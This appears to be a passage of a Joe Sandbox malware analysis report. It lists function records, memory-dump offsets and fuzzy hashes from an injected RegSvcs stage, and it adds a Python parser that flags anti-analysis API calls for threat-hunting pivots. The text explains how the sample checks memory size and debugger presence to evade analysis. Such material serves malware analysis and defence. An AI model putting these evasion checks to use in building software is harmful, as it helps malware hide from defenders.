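                                                The two API records above (GlobalMemoryStatusEx at 0117F44F and CheckRemoteDebuggerPresent at 01177F47, both in the 01170000 dump of RegSvcs) are the anti-analysis checks the report flags: GlobalMemoryStatusEx is commonly used to compare total physical memory against a threshold (analysis VMs are often given little RAM), and CheckRemoteDebuggerPresent asks the kernel whether a debugger is attached. The report does not show the threshold or the branch taken, only the call sites. What follows is an added example, not Joe Sandbox's code and not part of this report: a small Python parser for this flattened record layout that pulls out each function's entry block, called APIs, memory-dump offset and Instruction Fuzzy Hash, then flags functions that call known anti-analysis APIs. The record boundaries (a record ends at its "Instruction Fuzzy Hash" line) are inferred from the page text, the sample input is constructed from records copied from the page with some fields trimmed, and the anti-analysis API list is a seed the analyst extends.

```python
"""Parse flattened Joe Sandbox function records and flag anti-analysis API use.

Added example. The record layout (bullet fields, one record ending at its
"Instruction Fuzzy Hash" line) is inferred from the report text, not from any
Joe Sandbox API.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# "• <Api>.<Module>(...), ref: <hex>"  (the "APIs" lines of a record)
API_LINE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+).*?\bref:\s*(?P<ref>[0-9A-Fa-f]+)")
# "• <Key>: <value>"  (every other bullet field; bullets without a colon are ignored)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SRC_LINE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# Seed list: the two APIs this report shows. Assumption: the analyst extends it
# per case (e.g. IsDebuggerPresent, which this report does not contain).
ANTI_ANALYSIS_APIS = {"GlobalMemoryStatusEx", "CheckRemoteDebuggerPresent"}

# Constructed sample: three records in the shape of the report text; fields the
# parser ignores are trimmed from records 2 and 3. Hashes/addresses are the page's.
SAMPLE = r"""
Control-flow Graph
• Executed
• Not Executed
control_flow_graph 453 117f3ac-117f3c9 456 117f3cf-117f45c GlobalMemoryStatusEx 453->456
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 0117F44F
Memory Dump Source
• Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: c81cdb42d4c340a8623f32eeafba095d8ccdedf79711c7d66a346063f4c210e9
• Instruction ID: a46783250ae8975bcb01d358f2c974771fae598147cb97ecd78c649567b4321b
• Opcode Fuzzy Hash: c81cdb42d4c340a8623f32eeafba095d8ccdedf79711c7d66a346063f4c210e9
• Instruction Fuzzy Hash: 3721BAB1C0025A8FDB14DFAAD4487DEFBF4AF48310F10856AD928A7350D7789846CFA1
control_flow_graph 464 1177ec8-1177f54 CheckRemoteDebuggerPresent 467 1177f56-1177f5c 464->467
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01177F47
• Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
• API ID: CheckDebuggerPresentRemote
• Instruction Fuzzy Hash: 492166B18002598FDB10CF9AD584BEEBBF4AF49220F14845AE458A3351D738A945CF61
control_flow_graph 514 68d4699-68d469c 515 68d46a5-68d46e7 514->515
Strings
• Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
• String ID: \Oq
• API String ID: 0-643489707
• Instruction Fuzzy Hash: 09F0FE30A50129DFEB14DF94E859BADBBB2FF88704F20411AE502A7294CB755D45CF90
"""


@dataclass
class FunctionRecord:
    entry: str = ""  # first basic block on the control_flow_graph line
    apis: List[Tuple[str, str, str]] = field(default_factory=list)  # (api, module, ref)
    fields: Dict[str, str] = field(default_factory=dict)

    def dump_offset(self) -> str:
        m = SRC_LINE.search(self.fields.get("Source File", ""))
        return m["offset"] if m else "?"


def parse_report(text: str) -> List[FunctionRecord]:
    """Split the flattened text into one FunctionRecord per analysed function."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()  # the report is indented by ~48 spaces
        if not line:
            continue
        if line.startswith("control_flow_graph"):
            parts = line.split()  # "<id> <start>-<end> ..." ; first range is the entry block
            cur.entry = parts[2].split("-")[0] if len(parts) > 2 else ""
            continue
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["api"], m["module"], m["ref"]))
            continue
        m = FIELD_LINE.match(line)
        if not m:
            continue  # section labels such as "APIs", "Strings", legend bullets
        key, value = m["key"].strip(), m["value"].strip()
        cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":  # last field of every record
            records.append(cur)
            cur = FunctionRecord()
    return records


def flag_anti_analysis(records: List[FunctionRecord]) -> List[dict]:
    """Return one hit per (function, anti-analysis API) pair, with pivot data."""
    hits = []
    for r in records:
        for api, module, ref in r.apis:
            if api in ANTI_ANALYSIS_APIS:
                hits.append({"entry": r.entry, "api": api, "module": module, "ref": ref,
                             "dump": r.dump_offset(),
                             "ihash": r.fields.get("Instruction Fuzzy Hash", "")})
    return hits


def functions_per_dump(records: List[FunctionRecord]) -> Dict[str, int]:
    """How many analysed functions live in each memory dump (by load offset)."""
    counts: Dict[str, int] = {}
    for r in records:
        counts[r.dump_offset()] = counts.get(r.dump_offset(), 0) + 1
    return counts


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for h in flag_anti_analysis(recs):
        print(f"{h['dump']} {h['entry']} {h['api']} ({h['module']}) ref={h['ref']}")
    print(functions_per_dump(recs))
```

                                                Run it over the saved report text and pivot each flagged entry address into the matching .sdmp dump (here 01170000 for both anti-analysis functions, the unpacked stage injected into RegSvcs). The Instruction Fuzzy Hash values are the keys Joe Sandbox uses in the Similarity section, so carrying them out of the hits is what lets you match the same checks in other reports of the same family.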

                                                Control-flow Graph
                                                • Graph image not captured; entry block 68dfedb, calls 117ee58 or 117ee78 (two alternative call targets from the same block)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 01199b4ff502dd470d880d185c7a13fd50bcd93f2a6e381174ee87e3865002a7
                                                • Instruction ID: a845ce22ffed6958d2e414fa0a3aeb3e768b57cdc5acd1898207978cb0ca3e5c
                                                • Opcode Fuzzy Hash: 01199b4ff502dd470d880d185c7a13fd50bcd93f2a6e381174ee87e3865002a7
                                                • Instruction Fuzzy Hash: B521A174B083549FDB449B78C81476E7BF1AF89704F1544AEEA4ADB392DB799C00CB90

                                                Control-flow Graph
                                                • Graph image not captured; entry block 68dfef8, calls 117ee58 or 117ee78 (two alternative call targets from the same block)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 54e5a7540ba1bb4e110e7acd501d72cf2baf46a1bddbf09237c5c1faaa110553
                                                • Instruction ID: c745b4afe22cb046219d7bd28afcdf9cbdcb1018a83ad663406bb961c3a31fc5
                                                • Opcode Fuzzy Hash: 54e5a7540ba1bb4e110e7acd501d72cf2baf46a1bddbf09237c5c1faaa110553
                                                • Instruction Fuzzy Hash: CF115B75B442249FDB44AB78C805B6EBBF5AF4D704F10846AE60AEB390DB769C00CB90

                                                Control-flow Graph
                                                • Graph image not captured; entry block 68d4699, no calls
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Oq
                                                • API String ID: 0-643489707
                                                • Opcode ID: 67dc7da5cd511d6bbcb8ad4ac7b9e8395bb747ce1ef70aa298f58fd4dcfc5785
                                                • Instruction ID: 8c441ca1035252a4a2397a0d4e2b203540b28d4833afc92c9c3448f526acc7ab
                                                • Opcode Fuzzy Hash: 67dc7da5cd511d6bbcb8ad4ac7b9e8395bb747ce1ef70aa298f58fd4dcfc5785
                                                • Instruction Fuzzy Hash: 09F0FE30A50129DFEB14DF94E859BADBBB2FF88704F20411AE502A7294CB755D45CF90
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40276cbe411bd34ad9a6632c3310a7cdaf013416e4e26199e5e102bb2e3886a4
                                                • Instruction ID: cadad76680df75b6e9c8151eec423028712bb675e3d35c660ac2c9d9d51f2959
                                                • Opcode Fuzzy Hash: 40276cbe411bd34ad9a6632c3310a7cdaf013416e4e26199e5e102bb2e3886a4
                                                • Instruction Fuzzy Hash: 0E926634A00204CFDBA4DB68C594B9DBBF2FB49314F5484A9D609EB351DB35EE81CBA1

                                                Control-flow Graph
                                                • Graph image not captured; entry block 68dcf50, calls 68ddac5 and 68d61a0 (three call sites)
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5406d87195491b5a671fa7d879bcde872d964480049ca03f6c4462b51bd0f922
                                                • Instruction ID: 5aa0ff61be131e61c783ec0152665155070ede5b723475457f73b92aee96e71c
                                                • Opcode Fuzzy Hash: 5406d87195491b5a671fa7d879bcde872d964480049ca03f6c4462b51bd0f922
                                                • Instruction Fuzzy Hash: EB625B30A00A098FCB55EF68D580A9EB7B2FF84314B20CA69D0459F355EB75ED86CB91
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b9c6b414e80f84b77355314b41e82ff1ad42b57e927ba0e1c5748d5b3025adc
                                                • Instruction ID: b6273081e02925e6f0fcd991fc51b05c8c3afaf39bacbba0233c9e68a6e81271
                                                • Opcode Fuzzy Hash: 4b9c6b414e80f84b77355314b41e82ff1ad42b57e927ba0e1c5748d5b3025adc
                                                • Instruction Fuzzy Hash: C9E17E30E102098FDB69DF68D4806AEB7B2FF89314F208529D905EB345EB75DD82CB91
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 009b22828835c876dd343a0ffbbfac09ce1c3f4d6684043fad8ecdfb1fac590c
                                                • Instruction ID: 457e1b32c5ab0d24bb81c55127d60a40f4bcd093da719dd84b49f5b8dfa39c8c
                                                • Opcode Fuzzy Hash: 009b22828835c876dd343a0ffbbfac09ce1c3f4d6684043fad8ecdfb1fac590c
                                                • Instruction Fuzzy Hash: 0AB16CB0E002098FEFA4DF68C480BADBBB2FB49310F258566D555DB356DA34DC85CBA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7867089f027520cc76cb91f7508c31563de245eb64a60e8e338c592df5af5f83
                                                • Instruction ID: 50d7e38e8d567a46c03edd40c3e1b1cb7f3bf4636a5d8be2f3b382f46b35d834
                                                • Opcode Fuzzy Hash: 7867089f027520cc76cb91f7508c31563de245eb64a60e8e338c592df5af5f83
                                                • Instruction Fuzzy Hash: B0916070B506098FDB64DB68D890BAEB7B6FF88314F108469C909EB348EB70DD418F91
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9640436430cf14e19fe9bfd64e64adca890ba065991314574abff8091f712903
                                                • Instruction ID: 5d1bfb170d19c40c1a9410dba49f0a0a714bbffcfd98d1fc8b49731955a85261
                                                • Opcode Fuzzy Hash: 9640436430cf14e19fe9bfd64e64adca890ba065991314574abff8091f712903
                                                • Instruction Fuzzy Hash: B761B371F001104FDB55AA7EC88065EBAEBAFD4620F154436D90AEB360DFB9DD0287E2
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93e52a54f184fe49df64ba855cc0b73e4bdf81593caf6affce26dfe5bb57d5d3
                                                • Instruction ID: 1d1b00904c12151104475beb711d2e9c5f85d3a23686606eb2c0c57bd8e3a972
                                                • Opcode Fuzzy Hash: 93e52a54f184fe49df64ba855cc0b73e4bdf81593caf6affce26dfe5bb57d5d3
                                                • Instruction Fuzzy Hash: 2751E331E012059FDB18AB78E4846ADBBB2FF89314F204879E706DB251DB358955DB90
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38dc62554972f90e3b7a96836a0dfade62bd328e3babec9acf34291f5639e4ec
                                                • Instruction ID: 5455435b03769256a8ad692a93f2a4b78013c62d1ed3f0c4c559a9270a7de816
                                                • Opcode Fuzzy Hash: 38dc62554972f90e3b7a96836a0dfade62bd328e3babec9acf34291f5639e4ec
                                                • Instruction Fuzzy Hash: 2B01AF30B105104FDB64EA6CD950BAE77EAEB89714F118838F60AC7344EA76DD4287D0
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ec7ac7ed9ed526b844027d8316e223f074ea5c0e2c08e9a5bdd4cfeb0a1ee38
                                                • Instruction ID: bfab406c13b2bee84ff952f81c844dae2f1e4ee575ccaddff583452534a3755a
                                                • Opcode Fuzzy Hash: 8ec7ac7ed9ed526b844027d8316e223f074ea5c0e2c08e9a5bdd4cfeb0a1ee38
                                                • Instruction Fuzzy Hash: F4E09271D15109DFEB20CEB4C98176E77E9EF41344F2048AAD548DB241E333CE928740

                                                Execution Graph

                                                Execution Coverage:8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:107
                                                Total number of Limit Nodes:10
                                                execution_graph 24493 1694668 24494 169467a 24493->24494 24495 1694686 24494->24495 24499 1694779 24494->24499 24504 1693e28 24495->24504 24497 16946a5 24500 169479d 24499->24500 24508 1694878 24500->24508 24512 1694888 24500->24512 24505 1693e33 24504->24505 24520 1695c68 24505->24520 24507 1696ff6 24507->24497 24509 1694888 24508->24509 24511 169498c 24509->24511 24516 16944b0 24509->24516 24513 16948af 24512->24513 24514 169498c 24513->24514 24515 16944b0 CreateActCtxA 24513->24515 24515->24514 24517 1695918 CreateActCtxA 24516->24517 24519 16959db 24517->24519 24519->24519 24521 1695c73 24520->24521 24524 1695c88 24521->24524 24523 1697195 24523->24507 24525 1695c93 24524->24525 24528 1695cb8 24525->24528 24527 169727a 24527->24523 24529 1695cc3 24528->24529 24532 1695ce8 24529->24532 24531 169736d 24531->24527 24533 1695cf3 24532->24533 24535 169866b 24533->24535 24538 169ad19 24533->24538 24534 16986a9 24534->24531 24535->24534 24542 169ce00 24535->24542 24548 169ad41 24538->24548 24553 169ad50 24538->24553 24539 169ad2e 24539->24535 24543 169cdb4 24542->24543 24544 169ce06 24542->24544 24543->24534 24545 169ce55 24544->24545 24568 169cfc0 24544->24568 24572 169cfb0 24544->24572 24545->24534 24549 169ad50 24548->24549 24558 169ae48 24549->24558 24563 169ae37 24549->24563 24550 169ad5f 24550->24539 24554 169ad51 24553->24554 24556 169ae48 GetModuleHandleW 24554->24556 24557 169ae37 GetModuleHandleW 24554->24557 24555 169ad5f 24555->24539 24556->24555 24557->24555 24560 169ae49 24558->24560 24559 169ae7c 24559->24550 24560->24559 24561 169b080 GetModuleHandleW 24560->24561 24562 169b0ad 24561->24562 24562->24550 24565 169ae48 24563->24565 24564 169ae7c 24564->24550 24565->24564 24566 169b080 GetModuleHandleW 24565->24566 24567 169b0ad 24566->24567 24567->24550 24569 169cfcd 24568->24569 24570 169d007 24569->24570 24576 169b820 24569->24576 24570->24545 24573 169cfc0 24572->24573 24574 169b820 3 API calls 
24573->24574 24575 169d007 24573->24575 24574->24575 24575->24545 24577 169b82b 24576->24577 24579 169dd18 24577->24579 24580 169d124 24577->24580 24579->24579 24581 169d12f 24580->24581 24582 1695ce8 3 API calls 24581->24582 24583 169dd87 24582->24583 24584 169dd96 24583->24584 24587 169ddf2 24583->24587 24591 169de00 24583->24591 24584->24579 24588 169de00 24587->24588 24589 169d1c0 GetFocus 24588->24589 24590 169de57 24588->24590 24589->24590 24592 169de2e 24591->24592 24593 169d1c0 GetFocus 24592->24593 24594 169de57 24592->24594 24593->24594 24617 169d4d8 24618 169d51e GetCurrentProcess 24617->24618 24620 169d569 24618->24620 24621 169d570 GetCurrentThread 24618->24621 24620->24621 24622 169d5ad GetCurrentProcess 24621->24622 24623 169d5a6 24621->24623 24625 169d5e3 24622->24625 24623->24622 24624 169d60b GetCurrentThreadId 24626 169d63c 24624->24626 24625->24624 24595 76c71ca 24599 76c7cb8 24595->24599 24603 76c7cc0 24595->24603 24596 76c71de 24600 76c7cc0 VirtualProtect 24599->24600 24602 76c7d42 24600->24602 24602->24596 24604 76c7d08 VirtualProtect 24603->24604 24605 76c7d42 24604->24605 24605->24596 24627 76c59b4 24629 76c7cb8 VirtualProtect 24627->24629 24630 76c7cc0 VirtualProtect 24627->24630 24628 76c59e5 24629->24628 24630->24628 24606 169d720 DuplicateHandle 24607 169d7b6 24606->24607 24612 76c66c1 24614 76c66c4 24612->24614 24613 76c6729 24614->24613 24615 76c7cb8 VirtualProtect 24614->24615 24616 76c7cc0 VirtualProtect 24614->24616 24615->24614 24616->24614

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0169D556
                                                • GetCurrentThread.KERNEL32 ref: 0169D593
                                                • GetCurrentProcess.KERNEL32 ref: 0169D5D0
                                                • GetCurrentThreadId.KERNEL32 ref: 0169D629
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 62b9d7285993dd57078f0f7126a9fd20404cdf40f03389e9435d1433c53f1050
                                                • Instruction ID: b4280da484f0d20f19fb13b5f3dd767a94f5e2de897c619076fb5ac56d2bf1e8
                                                • Opcode Fuzzy Hash: 62b9d7285993dd57078f0f7126a9fd20404cdf40f03389e9435d1433c53f1050
                                                • Instruction Fuzzy Hash: 225165B09003498FDB14DFA9D948B9EBBF1FF88314F20846AE419A7350DB789985CF65

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0169D556
                                                • GetCurrentThread.KERNEL32 ref: 0169D593
                                                • GetCurrentProcess.KERNEL32 ref: 0169D5D0
                                                • GetCurrentThreadId.KERNEL32 ref: 0169D629
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: dc47cc93b06f518402fd58da2548425d34460c5102190723006181d9a22bd006
                                                • Instruction ID: fd7d952e4d8ce6f320c9bc778f56cd1c61d21b5eb9e81535e6192bf7c9b6b4ca
                                                • Opcode Fuzzy Hash: dc47cc93b06f518402fd58da2548425d34460c5102190723006181d9a22bd006
                                                • Instruction Fuzzy Hash: C15178B09003098FDB14DFAAD848B9EBBF5FF88314F20846AE419A7350DB789945CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 339 169ae48-169ae57 341 169ae59-169ae66 call 169a1a0 339->341 342 169ae83-169ae87 339->342 348 169ae68 341->348 349 169ae7c 341->349 344 169ae89-169ae93 342->344 345 169ae9b-169aedc 342->345 344->345 351 169aee9-169aef7 345->351 352 169aede-169aee6 345->352 395 169ae6e call 169b0d1 348->395 396 169ae6e call 169b0e0 348->396 349->342 353 169aef9-169aefe 351->353 354 169af1b-169af1d 351->354 352->351 356 169af09 353->356 357 169af00-169af07 call 169a1ac 353->357 359 169af20-169af27 354->359 355 169ae74-169ae76 355->349 358 169afb8-169b078 355->358 361 169af0b-169af19 356->361 357->361 390 169b07a-169b07d 358->390 391 169b080-169b0ab GetModuleHandleW 358->391 362 169af29-169af31 359->362 363 169af34-169af3b 359->363 361->359 362->363 366 169af48-169af51 call 169a1bc 363->366 367 169af3d-169af45 363->367 371 169af5e-169af63 366->371 372 169af53-169af5b 366->372 367->366 373 169af81-169af8e 371->373 374 169af65-169af6c 371->374 372->371 381 169afb1-169afb7 373->381 382 169af90-169afae 373->382 374->373 376 169af6e-169af7e call 169a1cc call 169a1dc 374->376 376->373 382->381 390->391 392 169b0ad-169b0b3 391->392 393 169b0b4-169b0c8 391->393 392->393 395->355 396->355
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0169B09E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4674d12abea7b3e77d0de81ca2c32d94a75f1f26c5bbc52230fe84547c159f87
                                                • Instruction ID: 669b4520679029561d938a55a7aa2423128e0e55bf301f926e89851377b6c7b9
                                                • Opcode Fuzzy Hash: 4674d12abea7b3e77d0de81ca2c32d94a75f1f26c5bbc52230fe84547c159f87
                                                • Instruction Fuzzy Hash: 3E7135B0A00B058FEB25CF69D85475ABBF6BF88210F008A2DD48AD7B50DB75E845CB95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 397 16944b0-16959d9 CreateActCtxA 400 16959db-16959e1 397->400 401 16959e2-1695a3c 397->401 400->401 408 1695a4b-1695a4f 401->408 409 1695a3e-1695a41 401->409 410 1695a51-1695a5d 408->410 411 1695a60 408->411 409->408 410->411 413 1695a61 411->413 413->413
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016959C9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 7f50391ad247d783a8cea53615ffdf44d13ea19bb84b98da1e832d60e6138c00
                                                • Instruction ID: 9758ba89cebf6856bbf24c6283ba2459d40272b28cce68c37e01be727cfda10c
                                                • Opcode Fuzzy Hash: 7f50391ad247d783a8cea53615ffdf44d13ea19bb84b98da1e832d60e6138c00
                                                • Instruction Fuzzy Hash: F741D270C0171CCBEB25CFA9C884B9DBBB5BF49314F60805AD809AB251DB796946CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 414 169590d-16959d9 CreateActCtxA 416 16959db-16959e1 414->416 417 16959e2-1695a3c 414->417 416->417 424 1695a4b-1695a4f 417->424 425 1695a3e-1695a41 417->425 426 1695a51-1695a5d 424->426 427 1695a60 424->427 425->424 426->427 429 1695a61 427->429 429->429
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016959C9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ff9515aa01e10ef200ee9b9e09a03d545676920e4c8fcb4547a7a8dd832fd167
                                                • Instruction ID: 7cb56a76423d63b0d180783c8d3423b51d0b2c6b2e1d38f7afcc28eb1e749b0c
                                                • Opcode Fuzzy Hash: ff9515aa01e10ef200ee9b9e09a03d545676920e4c8fcb4547a7a8dd832fd167
                                                • Instruction Fuzzy Hash: D541B170C01719CBEB25CFA9C884BDDBBB5BF49304F60816AD409AB250DB796946CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 435 169d720-169d7b4 DuplicateHandle 436 169d7bd-169d7da 435->436 437 169d7b6-169d7bc 435->437 437->436
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0169D7A7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 7cced156771cf110c0d3a02aab4d606e70813f648cf505f286712e0d2fece954
                                                • Instruction ID: 024ecf7ccc430653916d30042290d1d152e5a984d37054ce67a78940431029b9
                                                • Opcode Fuzzy Hash: 7cced156771cf110c0d3a02aab4d606e70813f648cf505f286712e0d2fece954
                                                • Instruction Fuzzy Hash: DC21C4B59002489FDB10CF9AD984AEEBBF9FB48310F14841AE918A7350D378A954CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 430 169d719-169d7b4 DuplicateHandle 431 169d7bd-169d7da 430->431 432 169d7b6-169d7bc 430->432 432->431
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0169D7A7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 722628004276fa724d893ee9c1f73325296eefc31ed597aa7644b344be3149ea
                                                • Instruction ID: d0750512fef5ebd41232d0e834adf842cb83fb42d61687948662b3ef77b41f64
                                                • Opcode Fuzzy Hash: 722628004276fa724d893ee9c1f73325296eefc31ed597aa7644b344be3149ea
                                                • Instruction Fuzzy Hash: 5221E4B5D002499FDB10CF9AD984AEEBBF4FB48320F14841AE918A7350D378A944CF60

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 440 76c7cb8-76c7d40 VirtualProtect 443 76c7d49-76c7d6a 440->443 444 76c7d42-76c7d48 440->444 444->443
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076C7D33
                                                Memory Dump Source
